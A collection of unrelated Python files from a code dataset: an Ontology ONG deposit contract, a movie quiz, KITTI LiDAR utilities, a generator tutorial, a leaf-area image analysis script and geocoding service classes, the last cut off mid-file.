+{"seq_id":"540927601","text":"OntCversion = '2.0.0'\nfrom ontology.interop.Ontology.Contract import Migrate\nfrom ontology.interop.System.Storage import GetContext, Get, Put\nfrom ontology.interop.System.Runtime import CheckWitness, GetTime, Notify\nfrom ontology.interop.System.ExecutionEngine import GetExecutingScriptHash\nfrom ontology.interop.Ontology.Native import Invoke\nfrom ontology.interop.Ontology.Runtime import Base58ToAddress\nfrom ontology.builtins import concat, state\n\nfrom ontology.libont import AddressFromVmCode\n\n\"\"\"\nhttps://github.com/ONT-Avocados/python-template/blob/master/libs/Utils.py\n\"\"\"\ndef Revert():\n    \"\"\"\n    Revert the transaction. 
The opcodes of this function is `09f7f6f5f4f3f2f1f000f0`,\n    but it will be changed to `ffffffffffffffffffffff` since opcode THROW doesn't\n    work, so, revert by calling unused opcode.\n    \"\"\"\n    raise Exception(0xF1F1F2F2F3F3F4F4)\n\n\n\"\"\"\nhttps://github.com/ONT-Avocados/python-template/blob/master/libs/SafeCheck.py\n\"\"\"\ndef Require(condition):\n    \"\"\"\n    If the condition is not satisfied, revert the transaction.\n    :param condition: required condition\n    :return: True if the condition holds; otherwise the transaction is reverted\n    \"\"\"\n    if not condition:\n        Revert()\n    return True\n\ndef RequireScriptHash(key):\n    \"\"\"\n    Checks the bytearray parameter is script hash or not. Script Hash\n    length should be equal to 20.\n    :param key: bytearray parameter to check script hash format.\n    :return: True if script hash or revert the transaction.\n    \"\"\"\n    Require(len(key) == 20)\n    return True\n\ndef RequireWitness(witness):\n    \"\"\"\n    Checks the transaction sender is equal to the witness. If not\n    satisfying, revert the transaction.\n    :param witness: required transaction sender\n    :return: True if transaction sender or revert the transaction.\n    \"\"\"\n    Require(CheckWitness(witness))\n    return True\n\n\nONGAddress = bytearray(b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02')\nContractAddress = GetExecutingScriptHash()\nAdmin = Base58ToAddress(\"AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p\")\n\nTOTAL_ONG_KEY = \"TotalONG\"\n\ndef Main(operation, args):\n    if operation == \"deposit\":\n        if len(args) != 2:\n            return False\n        account = args[0]\n        ongAmount = args[1]\n        return deposit(account, ongAmount)\n\n    if operation == \"getTotalOng\":\n        return getTotalOng()\n    if operation == \"getDepositAmount\":\n        if len(args) != 1:\n            return False\n        account = args[0]\n        return getDepositAmount(account)\n\n    if operation == \"migrateContract\":\n        if len(args) != 7:\n            return False\n        code = args[0]\n        needStorage = args[1]\n        name = args[2]\n        version = args[3]\n        author = args[4]\n        email = args[5]\n        description = args[6]\n        return migrateContract(code, needStorage, name, version, author, email, description)\n    return False\n\n\n\ndef deposit(account, ongAmount):\n    RequireWitness(account)\n    Require(_transferONG(account, ContractAddress, ongAmount))\n\n    Put(GetContext(), concat(\"D_ONG\", account), getDepositAmount(account) + ongAmount)\n    Put(GetContext(), TOTAL_ONG_KEY, getTotalOng() + ongAmount)\n    Notify([\"deposit\", account, ongAmount])\n    return True\n\ndef getDepositAmount(account):\n    return Get(GetContext(), concat(\"D_ONG\", account))\n\ndef getTotalOng():\n    return Get(GetContext(), TOTAL_ONG_KEY)\n\ndef migrateContract(code, needStorage, name, version, author, email, description):\n    RequireWitness(Admin)\n    # == Please make sure to transfer all the assets held by the old contract to the new contract.\n    # == If you do not transfer the assets out, including ONG, ONT, or OEP4 tokens,\n    # == these assets will be out of your control for good.\n    newReversedContractHash = AddressFromVmCode(code)\n    res = _transferONGFromContact(newReversedContractHash, getTotalOng())\n    Require(res)\n    if res == True:\n        res = Migrate(code, needStorage, name, version, author, email, description)\n        Require(res)\n        Notify([\"Migrate Contract successfully\", Admin, GetTime()])\n        return True\n    else:\n        Notify([\"MigrateContractError\", \"transfer ONG to new contract error\"])\n        return False\n\n\ndef _transferONG(fromAcct, toAcct, amount):\n    \"\"\"\n    transfer ONG\n    :param fromAcct:\n    :param toAcct:\n    :param amount:\n    :return:\n    \"\"\"\n    RequireWitness(fromAcct)\n    
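# native ONG transfers are invoked with a state(from, to, amount) struct\n    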
param = state(fromAcct, toAcct, amount)\n res = Invoke(0, ONGAddress, 'transfer', [param])\n if res and res == b'\\x01':\n return True\n else:\n return False\n\ndef _transferONGFromContact(toAcct, amount):\n param = state(ContractAddress, toAcct, amount)\n res = Invoke(0, ONGAddress, 'transfer', [param])\n if res and res == b'\\x01':\n return True\n else:\n return False","sub_path":"CheckBeforeMigrate/mustSeeBeforeMigrate.py","file_name":"mustSeeBeforeMigrate.py","file_ext":"py","file_size_in_byte":4728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"401869167","text":"# Write a 'quiz' program that asks the user a random series of movie quote questions from a dictionary. The 'key' should be the question (a string), and the 'value' should be the answer to the question (also a string). \n\n# Requirements\n\n# Prompt the user for how many quiz questions and ask only that amount.\n# There should be 10 total possible trivia questions -- you can start with the example ones and add 5 of your own.\n# Randomly choose each question from the dictionary without duplicates (see below).\n# If the user enters the wrong answer, the program should output the correct answer.\n# Keep a score of how many questions were correct and output the score at the end.\n# Number each question in the output (\"Question #1:, Question #2:\"), etc.\n# The answer should be case insensitive -- if the user answers tiTaNiC for Titanic and it should be correct.\n# The program should run once and exit.\n\nimport random\n\ndef main():\n questions = {\n \"Houston, we have a problem.\" : \"Apollo 13\",\n \"I'll be back.\" : \"Terminator\",\n \"I'm the king of the world\" : \"Titanic\",\n \"There's no place like home.\" : \"The Wizard of Oz\",\n \"You can't handle the truth!\" : \"A Few Good Men\",\n \"After all, tomorrow is another day!\" : \"Gone With the Wind\",\n \"You're gonna need a bigger boat.\" : \"Jaws\",\n \"I see dead people.\" : \"The Sixth Sense\",\n \"Well, nobody's perfect.\" : \"Some Like It Hot\",\n \"You've got to ask yourself one question: 'Do I feel lucky?' Well, do ya, punk?\" : \"Dirty Harry\"\n }\n\n print(\"Movie Quote Quiz\\n\")\n\n numQuestions = int(input(\"How many questions: \"))\n while numQuestions <0 or numQuestions>10:\n print(\"Error. Invalid input try again.\\n\")\n numQuestions = int(input(\"How many questions: \"))\n\n randomQuestions = random.sample(list(questions), numQuestions)\n qCounter = 1\n correctCounter = 0\n for x in randomQuestions:\n print(\"\\nQuestion: #%s\" %qCounter)\n print(x)\n userAnswer = str(input(\"Whats your answer: \" ))\n if(checkAnswer(userAnswer, questions[x])):\n print(\"\\nGreat you got it right!\")\n correctCounter +=1\n else: \n print(\"\\nIncorrect! 
The correct answer is: \" , questions[x])\n qCounter +=1\n print(\"\\nYou got %d\" %correctCounter + \" questions correct!\")\n\n \ndef checkAnswer(userAns, movieAns):\n isCorrect = False\n #Convert both to lower case to elimate case sens errors\n convAns = userAns.lower()\n convMovie = movieAns.lower()\n\n #Compare by seeing if answer is in user answer\n if convAns == convMovie:\n isCorrect = True\n else:\n isCorrect = False\n\n return isCorrect\n\nmain()\n","sub_path":"Week4/Assignment4.py","file_name":"Assignment4.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"173588394","text":"\"\"\"\n Util scripts for building features, fetching ground truths, computing IoU, etc. \n\"\"\"\n\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.utils.data as data\nimport numpy as np\nimport cv2\nimport math\nimport json\nimport pdb\n\n# Load configs fron json\nwith open('config.json', 'r') as f:\n config = json.load(f)\n\n# Classes of objects and anchors\nclass_list = config[\"class_list\"]\nanchors = config[\"anchors\"]\n\ndef makeBVFeature(PointCloud_, BoundaryCond, Discretization):\n \n # 1024 x 1024 x 3\n Height = 1024 + 1\n Width = 1024 + 1\n\n # Discretize Feature Map\n PointCloud = np.copy(PointCloud_)\n PointCloud[:,0] = np.int_(np.floor(PointCloud[:,0] / Discretization)) # <- X\n PointCloud[:,1] = np.int_(np.floor(PointCloud[:,1] / Discretization) + Width / 2) # <- Y ranges between [-range, range] \n\n # sort 3times with respect to z, y and x respectively\n indices = np.lexsort((-PointCloud[:,2], PointCloud[:,1], PointCloud[:,0]))\n PointCloud = PointCloud[indices]\n\n # Height Map\n heightMap = np.zeros((Height, Width))\n\n # Remove duplicate points\n _, indices, counts = np.unique(PointCloud[:, 0:2], axis = 0, return_index = True, return_counts=True)\n PointCloud_uniq = PointCloud[indices]\n\n # Counts-> Number of duplicate elements for each index in the unique array\n # X in the data is front -> image coordinates y\n # Y in the data is left -> image coordinates x\n heightMap[np.int_(PointCloud_uniq[:, 0]), np.int_(PointCloud_uniq[:, 1])] = PointCloud_uniq[:, 2]\n\n # Intensity Map & DensityMap ##########################\n \n # _, indices, counts = np.unique(PointCloud[:, 0:2], axis = 0, return_index = True, return_counts = True)\n # PointCloud_top = PointCloud[indices]\n # Changed PointCloud_top -> PointCLoud_uniq\n \n # Intensity Map\n intensityMap = np.zeros((Height, Width))\n intensityMap[np.int_(PointCloud_uniq[:, 0]), np.int_(PointCloud_uniq[:, 1])] = PointCloud_uniq[:, 3]\n\n # Density Map\n normalizedCounts = np.minimum(1.0, np.log(counts + 1) / np.log(64))\n densityMap = np.zeros((Height, Width))\n densityMap[np.int_(PointCloud_uniq[:, 0]), np.int_(PointCloud_uniq[:, 1])] = normalizedCounts\n \n\n # RGB channels respectively\n RGB_Map = np.zeros((Height,Width, 3))\n RGB_Map[:,:,0] = densityMap\n RGB_Map[:,:,1] = heightMap\n RGB_Map[:,:,2] = intensityMap\n \n # save = np.zeros((512, 1024, 3))\n save = RGB_Map[0:512, 0:1024, :]\n return save\n\n\ndef get_target(label_file, Tr, boundary, class_list):\n \"\"\" Make target vector (class, x, y, w, l, im, re) \"\"\"\n target = np.zeros([50, 7], dtype = np.float32)\n minX = boundary['minX'] ; maxX = boundary['maxX']\n minY = boundary['minY'] ; maxY = boundary['maxY']\n minZ = boundary['minZ'] ; maxZ = boundary['maxZ']\n \n with open(label_file, 'r') as f:\n lines = f.readlines() \n\n num_obj = len(lines)\n 
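# note: column 1 stores the normalized Y and column 2 the normalized X, so\n    # the docstring order (class, x, y, w, l, im, re) has x/y swapped in the code\n    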
index = 0\n for j in range(num_obj):\n obj = lines[j].strip().split(' ')\n obj_class = obj[0].strip()\n if obj_class in class_list:\n\n # Get target 3D object location x, y\n t_lidar , box3d_corner = box3d_cam_to_velo(obj[8:], Tr)\n location_x = t_lidar[0][0] \n location_y = t_lidar[0][1] \n \n if (location_x > minX) and (location_x < maxX) and (location_y > minY) and (location_y < maxY):\n \n # Make sure target inside the covering area (0,1)\n # x and y interchange?\n target[index][2] = location_x / 40 # X is along height\n \n # Should put this in [0,1] ,so divide max_size 80 m\n target[index][1] = (location_y + 40)/80 # Y is along width\n obj_width = obj[9].strip()\n obj_length = obj[10].strip()\n target[index][3] = float(obj_width) / 80\n target[index][4] = float(obj_length) / 40\n\n # Get target Observation angle of object, ranging [-pi .. pi]\n obj_alpha = obj[3].strip()\n assert target[index][1] <= 1 \n assert target[index][2] <= 1\n # Im axis\n target[index][5] = math.sin(float(obj_alpha))\n\n # Re axis\n target[index][6] = math.cos(float(obj_alpha))\n for i in range(len(class_list)):\n if obj_class == class_list[i]:\n target[index][0] = i\n index = index + 1\n \n return target\n\n\ndef box3d_cam_to_velo(box3d, Tr):\n\n def project_cam2velo(cam, Tr):\n T = np.zeros([4, 4], dtype = np.float32)\n T[:3, :] = Tr\n T[3, 3] = 1\n T_inv = np.linalg.inv(T)\n lidar_loc_ = np.dot(T_inv, cam)\n lidar_loc = lidar_loc_[:3]\n return lidar_loc.reshape(1, 3)\n\n def ry_to_rz(ry):\n angle = -ry - np.pi / 2\n if angle >= np.pi:\n angle -= np.pi\n if angle < -np.pi:\n angle = 2 * np.pi + angle\n return angle\n\n h, w, l, tx, ty, tz, ry = [float(i) for i in box3d]\n cam = np.ones([4, 1])\n cam[0] = tx\n cam[1] = ty\n cam[2] = tz\n t_lidar = project_cam2velo(cam, Tr)\n Box = np.array([[-l / 2, -l / 2, l / 2, l / 2, -l / 2, -l / 2, l / 2, l / 2],\n [w / 2, -w / 2, -w / 2, w / 2, w / 2, -w / 2, -w / 2, w / 2],\n [0, 0, 0, 0, h, h, h, h]])\n rz = ry_to_rz(ry)\n rotMat = np.array([\n [np.cos(rz), -np.sin(rz), 0.0],\n [np.sin(rz), np.cos(rz), 0.0],\n [0.0, 0.0, 1.0]])\n velo_box = np.dot(rotMat, Box)\n cornerPosInVelo = velo_box + np.tile(t_lidar, (8, 1)).T\n box3d_corner = cornerPosInVelo.transpose()\n return t_lidar , box3d_corner.astype(np.float32)\n\n\ndef load_kitti_calib(calib_file):\n \"\"\"\n load projection matrix\n \"\"\"\n with open(calib_file) as fi:\n lines = fi.readlines()\n assert (len(lines) == 8)\n obj = lines[0].strip().split(' ')[1:]\n P0 = np.array(obj, dtype=np.float32)\n obj = lines[1].strip().split(' ')[1:]\n P1 = np.array(obj, dtype=np.float32)\n obj = lines[2].strip().split(' ')[1:]\n P2 = np.array(obj, dtype=np.float32)\n obj = lines[3].strip().split(' ')[1:]\n P3 = np.array(obj, dtype=np.float32)\n obj = lines[4].strip().split(' ')[1:]\n R0 = np.array(obj, dtype=np.float32)\n obj = lines[5].strip().split(' ')[1:]\n Tr_velo_to_cam = np.array(obj, dtype=np.float32)\n obj = lines[6].strip().split(' ')[1:]\n Tr_imu_to_velo = np.array(obj, dtype=np.float32)\n return {'P2': P2.reshape(3, 4),\n 'R0': R0.reshape(3, 3),\n 'Tr_velo2cam': Tr_velo_to_cam.reshape(3, 4)}\n\n\ndef bbox_iou(box1, box2, x1y1x2y2 = True):\n if x1y1x2y2:\n mx = min(box1[0], box2[0])\n Mx = max(box1[2], box2[2])\n my = min(box1[1], box2[1])\n My = max(box1[3], box2[3])\n w1 = box1[2] - box1[0]\n h1 = box1[3] - box1[1]\n w2 = box2[2] - box2[0]\n h2 = box2[3] - box2[1]\n else:\n mx = min(box1[0] - box1[2] / 2.0, box2[0] - box2[2] / 2.0)\n Mx = max(box1[0] + box1[2] / 2.0, box2[0] + box2[2] / 2.0)\n my = min(box1[1] - 
box1[3] / 2.0, box2[1] - box2[3] / 2.0)\n        My = max(box1[1] + box1[3] / 2.0, box2[1] + box2[3] / 2.0)\n        w1 = box1[2]\n        h1 = box1[3]\n        w2 = box2[2]\n        h2 = box2[3]\n    uw = Mx - mx\n    uh = My - my\n    cw = w1 + w2 - uw\n    ch = h1 + h2 - uh\n    carea = 0\n    if cw <= 0 or ch <= 0:\n        return 0.0\n    area1 = w1 * h1\n    area2 = w2 * h2\n    carea = cw * ch\n    uarea = area1 + area2 - carea\n    return carea / uarea\n\n\ndef bbox_ious(boxes1, boxes2, x1y1x2y2 = True):\n    if x1y1x2y2:\n        mx = torch.min(boxes1[0], boxes2[0])\n        Mx = torch.max(boxes1[2], boxes2[2])\n        my = torch.min(boxes1[1], boxes2[1])\n        My = torch.max(boxes1[3], boxes2[3])\n        w1 = boxes1[2] - boxes1[0]\n        h1 = boxes1[3] - boxes1[1]\n        w2 = boxes2[2] - boxes2[0]\n        h2 = boxes2[3] - boxes2[1]\n    else:\n        mx = torch.min(boxes1[0] - boxes1[2] / 2.0, boxes2[0] - boxes2[2] / 2.0)\n        Mx = torch.max(boxes1[0] + boxes1[2] / 2.0, boxes2[0] + boxes2[2] / 2.0)\n        my = torch.min(boxes1[1] - boxes1[3] / 2.0, boxes2[1] - boxes2[3] / 2.0)\n        My = torch.max(boxes1[1] + boxes1[3] / 2.0, boxes2[1] + boxes2[3] / 2.0)\n        w1 = boxes1[2]\n        h1 = boxes1[3]\n        w2 = boxes2[2]\n        h2 = boxes2[3]\n    \n    uw = Mx - mx # Overall width\n    uh = My - my # Overall height\n    cw = w1 + w2 - uw # Intersection of width\n    ch = h1 + h2 - uh # Intersection of height\n    mask = ((cw <= 0) + (ch <= 0) > 0)\n    area1 = w1 * h1 \n    area2 = w2 * h2\n    carea = cw * ch # Intersection of area\n    carea[mask] = 0 # Area=0 for those batches that are apart -> -ve intersection\n    uarea = area1 + area2 - carea # Union of area\n    return carea / uarea\n\n\ndef nms(boxes, nms_thresh):\n    if len(boxes) == 0:\n        return boxes\n    det_confs = torch.zeros(len(boxes))\n    for i in range(len(boxes)):\n        det_confs[i] = 1 - boxes[i][4] \n    _, sortIds = torch.sort(det_confs)\n    out_boxes = []\n    for i in range(len(boxes)):\n        box_i = boxes[sortIds[i]]\n        if box_i[4] > 0:\n            out_boxes.append(box_i)\n            for j in range(i+1, len(boxes)):\n                box_j = boxes[sortIds[j]]\n                if bbox_iou(box_i, box_j, x1y1x2y2 = False) > nms_thresh:\n                    box_j[4] = 0\n    return out_boxes\n\n\ndef convert2cpu(gpu_matrix):\n    return torch.FloatTensor(gpu_matrix.size()).copy_(gpu_matrix)\n\n\ndef convert2cpu_long(gpu_matrix):\n    return torch.LongTensor(gpu_matrix.size()).copy_(gpu_matrix)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
+{"seq_id":"70736794","text":"def frange(start, stop, increment):\n    x = start\n    while x < stop:\n        a = yield x\n        print(a)\n        x += increment\n\n\nfor n in frange(0, 5, 1):\n    print(n)\n\ng = frange(0, 10, 1)\n\n# the first value sent into a just-started generator must be None\ng.send(None)\n\ng.send('this will be printed')\n\n\n# reverse iteration\n\na = [\n    1, 2, 3, 4\n]\n\nfor x in reversed(a):\n    print(x)\n\n\n# reverse iteration only works when the object being processed has a\n# determinable size or implements the __reversed__() special method\n\nclass Countdown:\n    def __init__(self, start):\n        self.start = start\n    \n    # forward iteration\n    def __iter__(self):\n        n = self.start\n        while n > 0:\n            yield n\n            n -= 1\n    \n    # reverse iteration\n    def __reversed__(self):\n        n = 1\n        while n <= self.start:\n            yield n\n            n += 1\n\n\n# a generator function that carries extra state\n\nfrom collections import deque\n\nclass linehistorys:\n    def __init__(self, lines, histlen=3):\n        self.lines = lines\n        self.history = deque(maxlen=histlen)\n    \n    def __iter__(self):\n        for lineno, line in enumerate(self.lines, 1):\n            self.history.append((lineno, line))\n            yield line\n\n    def clear(self):\n        self.history.clear()\n\n\nwith open('/etc/passwd') as f:\n    lines = linehistorys(f)\n    for line in lines:\n        if 'python' in line:\n            for lineno, hline in lines.history:\n                
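# replay the buffered (lineno, line) pairs that led up to the match\n                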
print('{}:{}'.format(lineno, hline), end='')\n\n\n# one detail: an object that merely implements __iter__() is only an iterable,\n# not yet an iterator. A for loop calls iter() on it automatically; to drive\n# it by hand, obtain an iterator with iter() first.\n\nf = open('/etc/passwd')\nit = iter(f)\nnext(it)\n\n","sub_path":"th_alogri_python/iterator/4-2.py","file_name":"4-2.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"}
+{"seq_id":"119841146","text":"\"\"\"penfiels_cotyledon_tray_area analysis.\"\"\"\n\nimport os\nimport logging\nimport argparse\n\nimport numpy as np\n\nimport dtool\n\nfrom jicbioimage.core.image import Image\nfrom jicbioimage.core.transform import transformation\nfrom jicbioimage.core.io import AutoName, AutoWrite\n\nfrom jicbioimage.illustrate import AnnotatedImage\n\n__version__ = \"0.1.0\"\n\nAutoName.prefix_format = \"{:03d}_\"\n\n\n@transformation\ndef identity(image):\n    \"\"\"Return the image as is.\"\"\"\n    return image\n\n\n@transformation\ndef green_minus_red(image):\n    im = image[:, :, 1] - image[:, :, 0]\n    red_gt_green = image[:, :, 0] > image[:, :, 1]\n    im[red_gt_green] = 0\n    return im\n\n\n@transformation\ndef abs_threshold(image, cutoff):\n    return image > cutoff\n\n\ndef find_leafs(image):\n    leafs = green_minus_red(image)\n    leafs = abs_threshold(leafs, 40)  # 30, 50\n    return leafs\n\n\ndef annotate(image, leafs, area, output_path):\n    grayscale = np.mean(image, axis=2)\n    ann = AnnotatedImage.from_grayscale(grayscale)\n    ann[leafs] = image[leafs]\n\n    ann.text_at(\n        \"Area (pixels): {}\".format(area),\n        position=(10, 10),\n        color=(255, 0, 255),\n        size=132,\n        antialias=False,\n        center=False)\n\n    with open(output_path, \"wb\") as fh:\n        fh.write(ann.png())\n\n\ndef analyse_file(fpath, output_dir):\n    \"\"\"Analyse a single file.\"\"\"\n    logging.info(\"Analysing file: {}\".format(fpath))\n    image = Image.from_file(fpath)\n\n    image = identity(image)\n    leafs = find_leafs(image)\n\n    output_fname = os.path.basename(fpath).split(\".\")[0] + \"_annotated.png\"\n    output_path = os.path.join(output_dir, output_fname)\n\n    area = int(np.sum(leafs))\n    annotate(image, leafs, area, output_path)\n    return area\n\n\ndef analyse_dataset(dataset_dir, output_dir):\n    \"\"\"Analyse all the files in the dataset.\"\"\"\n    dataset = dtool.DataSet.from_path(dataset_dir)\n    logging.info(\"Analysing files in dataset: {}\".format(dataset.name))\n\n    csv_fpath = os.path.join(output_dir, \"summary.csv\")\n    with open(csv_fpath, \"w\") as csv_fh:\n\n        csv_fh.write(\"identifier,image,tray,area\\n\")\n\n        for i in dataset.identifiers:\n\n            rel_path = dataset.item_from_hash(i)[\"path\"]\n            tray = os.path.dirname(rel_path)\n            image_out_dir = os.path.join(output_dir, tray)\n            if not os.path.isdir(image_out_dir):\n                os.mkdir(image_out_dir)\n\n            fpath = dataset.item_path_from_hash(i)\n            area = analyse_file(fpath, image_out_dir)\n\n            csv_row = [i, rel_path, tray, str(area)]\n            csv_line = \",\".join(csv_row)\n            csv_fh.write(csv_line + \"\\n\")\n\n\ndef main():\n    # Parse the command line arguments.\n    parser = argparse.ArgumentParser(description=__doc__)\n    parser.add_argument(\"dataset_dir\", help=\"Input dataset directory\")\n    parser.add_argument(\"output_dir\", help=\"Output directory\")\n    parser.add_argument(\"--debug\", default=False, action=\"store_true\",\n                        help=\"Write out intermediate images\")\n    args = parser.parse_args()\n\n    if not os.path.isdir(args.dataset_dir):\n        parser.error(\"Not a directory: {}\".format(args.dataset_dir))\n\n    # Create the output directory if it does not exist.\n    if not os.path.isdir(args.output_dir):\n        
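# note: os.mkdir assumes the parent exists; os.makedirs would create parents too\n        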
os.mkdir(args.output_dir)\n AutoName.directory = args.output_dir\n\n # Only write out intermediate images in debug mode.\n if not args.debug:\n AutoWrite.on = False\n\n # Setup a logger for the script.\n log_fname = \"audit.log\"\n log_fpath = os.path.join(args.output_dir, log_fname)\n logging_level = logging.INFO\n if args.debug:\n logging_level = logging.DEBUG\n logging.basicConfig(filename=log_fpath, level=logging_level)\n\n # Log some basic information about the script that is running.\n logging.info(\"Script name: {}\".format(__file__))\n logging.info(\"Script version: {}\".format(__version__))\n\n analyse_dataset(args.dataset_dir, args.output_dir)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"583168386","text":"import re\n\nfrom .base import GeocodeService\nimport json\nimport logging\nfrom omgeo.places import Candidate\nfrom omgeo.preprocessors import CancelIfPOBox, CountryPreProcessor, RequireCountry, \\\n ParseSingleLine, ReplaceRangeWithNumber\nfrom omgeo.postprocessors import AttrFilter, AttrExclude, AttrRename, AttrSorter, \\\n AttrMigrator, UseHighScoreIfAtLeast, GroupBy, ScoreSorter\nimport time\ntry:\n from urllib import unquote\nexcept ImportError:\n from urllib.parse import unquote\nlogger = logging.getLogger(__name__)\n\n\nclass Bing(GeocodeService):\n \"\"\"\n Class to geocode using Bing services:\n * `Find a Location by Query `_\n * `Find a Location by Address `_\n\n Settings used by the Bing GeocodeService object may include:\n * api_key -- The API key used to access Bing services.\n\n \"\"\"\n _endpoint = 'http://dev.virtualearth.net/REST/v1/Locations'\n\n DEFAULT_PREPROCESSORS = [\n ReplaceRangeWithNumber()\n ]\n\n DEFAULT_POSTPROCESSORS = [\n AttrMigrator('confidence', 'score',\n {'High':100, 'Medium':85, 'Low':50}),\n UseHighScoreIfAtLeast(100),\n AttrFilter(['Address', 'AdministrativeBuilding',\n 'AgriculturalStructure',\n 'BusinessName', 'BusinessStructure',\n 'BusStation', 'Camp', 'Church', 'CityHall',\n 'CommunityCenter', 'ConventionCenter',\n 'Courthouse', 'Factory', 'FerryTerminal',\n 'FishHatchery', 'Fort', 'Garden', 'Geyser',\n 'Heliport', 'IndustrialStructure',\n 'InformationCenter', 'Junction',\n 'LandmarkBuilding', 'Library', 'Lighthouse',\n 'Marina', 'MedicalStructure', 'MetroStation',\n 'Mine', 'Mission', 'Monument', 'Mosque',\n 'Museum', 'NauticalStructure', 'NavigationalStructure',\n 'OfficeBuilding', 'ParkAndRide', 'PlayingField',\n 'PoliceStation', 'PostOffice', 'PowerStation',\n 'Prison', 'RaceTrack', 'ReligiousStructure',\n 'RestArea', 'Ruin', 'ShoppingCenter', 'Site',\n 'SkiArea', 'Spring', 'Stadium', 'Temple',\n 'TouristStructure'], 'entity'),\n AttrRename('locator', dict(Rooftop='rooftop',\n Parcel='parcel',\n ParcelCentroid='parcel',\n Interpolation='interpolation',\n InterpolationOffset='interpolation_offset')),\n AttrSorter(['rooftop', 'parcel',\n 'interpolation_offset', 'interpolation'],\n 'locator'),\n AttrSorter(['Address'], 'entity'),\n ScoreSorter(),\n GroupBy(('x', 'y')),\n GroupBy('match_addr')]\n DEFAULT_POSTPROCESSORS = []\n\n def __init__(self, preprocessors=None, postprocessors=None, settings=None):\n preprocessors = Bing.DEFAULT_PREPROCESSORS if preprocessors is None else preprocessors\n postprocessors = Bing.DEFAULT_POSTPROCESSORS if postprocessors is None else postprocessors\n GeocodeService.__init__(self, preprocessors, 
postprocessors, settings)\n\n def _geocode(self, pq):\n if pq.query.strip() == '':\n # No single line query string; use address elements:\n query = {'addressLine': pq.address,\n 'locality': pq.city,\n 'adminDistrict': pq.state,\n 'postalCode': pq.postal,\n 'countryRegion': pq.country}\n else:\n query = {'query': pq.query}\n\n if pq.viewbox is not None:\n query = dict(query, **{'umv':pq.viewbox.to_bing_str()})\n if hasattr(pq, 'culture'):\n query = dict(query, c=pq.culture)\n if hasattr(pq, 'user_ip'):\n query = dict(query, uip=pq.user_ip)\n if hasattr(pq, 'user_lat') and hasattr(pq, 'user_lon'):\n query = dict(query, **{'ul':'%f,%f' % (pq.user_lat, pq.user_lon)})\n\n addl_settings = {'key':self._settings['api_key']}\n query = dict(query, **addl_settings)\n response_obj = self._get_json_obj(self._endpoint, query)\n returned_candidates = [] # this will be the list returned\n for r in response_obj['resourceSets'][0]['resources']:\n c = Candidate()\n c.entity = r['entityType']\n c.locator = r['geocodePoints'][0]['calculationMethod'] # ex. \"Parcel\"\n c.confidence = r['confidence'] # High|Medium|Low\n c.match_addr = r['name'] # ex. \"1 Microsoft Way, Redmond, WA 98052\"\n c.x = r['geocodePoints'][0]['coordinates'][1] # long, ex. -122.13\n c.y = r['geocodePoints'][0]['coordinates'][0] # lat, ex. 47.64\n c.wkid = 4326\n c.address = r['address']\n c.geoservice = self.__class__.__name__\n returned_candidates.append(c)\n return returned_candidates\n\n\nclass USCensus(GeocodeService):\n\n # set endpoint based on whether we geocode by single-line address, or with keyed components\n _endpoint = ''\n _endpoint_base = 'http://geocoding.geo.census.gov/geocoder/locations/'\n\n def _geocode(self, pq):\n query = {\n 'format': 'json',\n 'benchmark': 'Public_AR_Current'\n }\n\n if pq.query:\n _this_endpoint = '%s%s' % (self._endpoint_base, 'onelineaddress')\n query['address'] = pq.query\n else:\n _this_endpoint = '%s%s' % (self._endpoint_base, 'address')\n query['street'] = pq.address\n query['city'] = pq.city\n query['state'] = pq.state\n query['zip'] = pq.postal\n\n logger.debug('CENSUS QUERY: %s', query)\n response_obj = self._get_json_obj(_this_endpoint, query)\n logger.debug('CENSUS RESPONSE: %s', response_obj)\n\n returned_candidates = [] # this will be the list returned\n for r in response_obj['result']['addressMatches']:\n c = Candidate()\n c.match_addr = r['matchedAddress']\n c.x = r['coordinates']['x']\n c.y = r['coordinates']['y']\n c.geoservice = self.__class__.__name__\n # Optional address component fields.\n for in_key, out_key in [('city', 'match_city'), ('state', 'match_region'),\n ('zip', 'match_postal')]:\n setattr(c, out_key, r['addressComponents'].get(in_key, ''))\n setattr(c, 'match_subregion', '') # No county from Census geocoder.\n setattr(c, 'match_country', 'USA') # Only US results from Census geocoder\n setattr(c, 'match_streetaddr', self._street_addr_from_response(r))\n returned_candidates.append(c)\n return returned_candidates\n\n def _street_addr_from_response(self, match):\n \"\"\"Construct a street address (no city, region, etc.) 
from a geocoder response.\n\n :param match: The match object returned by the geocoder.\n \"\"\"\n # Same caveat as above regarding the ordering of these fields; the\n # documentation is not explicit about the correct ordering for\n # reconstructing a full address, but implies that this is the ordering.\n ordered_fields = ['preQualifier', 'preDirection', 'preType', 'streetName',\n 'suffixType', 'suffixDirection', 'suffixQualifier']\n result = []\n # The address components only contain a from and to address, not the\n # actual number of the address that was matched, so we need to cheat a\n # bit and extract it from the full address string. This is likely to\n # miss some edge cases (hopefully only a few since this is a US-only\n # geocoder).\n addr_num_re = re.match(r'([0-9]+)', match['matchedAddress'])\n if not addr_num_re: # Give up\n return ''\n result.append(addr_num_re.group(0))\n for field in ordered_fields:\n result.append(match['addressComponents'].get(field, ''))\n if any(result):\n return ' '.join([s for s in result if s]) # Filter out empty strings.\n else:\n return ''\n\n\nclass MapQuest(GeocodeService):\n \"\"\"\n Class to geocode using MapQuest licensed services.\n \"\"\"\n _endpoint = 'http://www.mapquestapi.com/geocoding/v1/address'\n\n def _geocode(self, pq):\n def get_appended_location(location, **kwargs):\n \"\"\"Add key/value pair to given dict only if value is not empty string.\"\"\"\n for kw in kwargs:\n if kwargs[kw] != '':\n location = 